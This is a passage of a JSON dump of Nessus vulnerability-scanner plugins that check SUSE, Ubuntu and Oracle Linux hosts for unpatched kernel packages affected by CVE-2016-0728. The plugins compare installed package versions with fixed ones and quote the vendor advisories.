get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-52.39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:59", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2872-3.NASL", "href": "https://www.tenable.com/plugins/nessus/88016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88016);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1020-raspi2\", pkgver:\"4.2.0-1020.27\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:46", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-utopic vulnerability (USN-2873-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2873-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2873-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88017);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2873-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-utopic vulnerability (USN-2873-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2873-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.16-generic,\nlinux-image-3.16-generic-lpae and / or linux-image-3.16-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2873-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-59-generic\", pkgver:\"3.16.0-59.79~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-59-generic-lpae\", pkgver:\"3.16.0-59.79~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-59-lowlatency\", pkgver:\"3.16.0-59.79~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.16-generic / linux-image-3.16-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:47", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2016-3510 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-01-21T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : kernel-uek (ELSA-2016-3510)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2016-3510.NASL", "href": "https://www.tenable.com/plugins/nessus/88033", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3510.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88033);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Oracle Linux 6 / 7 : kernel-uek (ELSA-2016-3510)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2016-3510 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1\n mishandles object references in a certain error case, which allows local users to gain privileges or cause\n a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2016-3510.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['4.1.12-32.1.2.el6uek', '4.1.12-32.1.2.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2016-3510');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '4.1';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-4.1.12-32.1.2.el6uek-0.5.1-1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-32.1.2.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-32.1.2.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'},\n {'reference':'dtrace-modules-4.1.12-32.1.2.el7uek-0.5.1-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-32.1.2.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-32.1.2.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if 